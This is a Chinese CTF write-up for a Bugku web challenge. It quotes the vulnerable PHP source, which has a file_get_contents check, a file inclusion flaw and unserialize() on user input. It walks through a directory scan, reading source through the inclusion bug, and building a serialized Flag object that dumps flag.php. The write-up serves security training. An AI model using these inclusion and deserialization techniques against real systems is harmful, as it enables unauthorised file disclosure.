题目
http://123.206.87.240:8006/test1/
拿到题之后先看源码
you are not the number of bugku !
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->
根据源码内容,修改post包
得到一段base64编码,解码之后
尝试修改post,得到
base64解码之后,得到一段代码
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "不能现在就给你flag哦";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->
下载SourceLeakHacker-master,SourceLeakHacker是一款敏感目录扫描工具。看到那个绿色的200表示能够成功访问,这就是扫出来的敏感路径
找到flag.php,重新修改之前的报文,得到
修改补全之前的Flag
<?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
$o = new Flag();
$o->file="flag.php";
$o->__tostring();
echo serialize($o);
?>
序列化:serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。
这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。以下是序列化后对应值:
String
s:size:value;
Integer
i:value;
Boolean
b:value; (does not store “true” or “false”, does store ‘1’ or ‘0’)
运行后得到结果:
得到flag.php内序列化后的内容,然后重新修改报文,提交之后的flag
最后拿到flag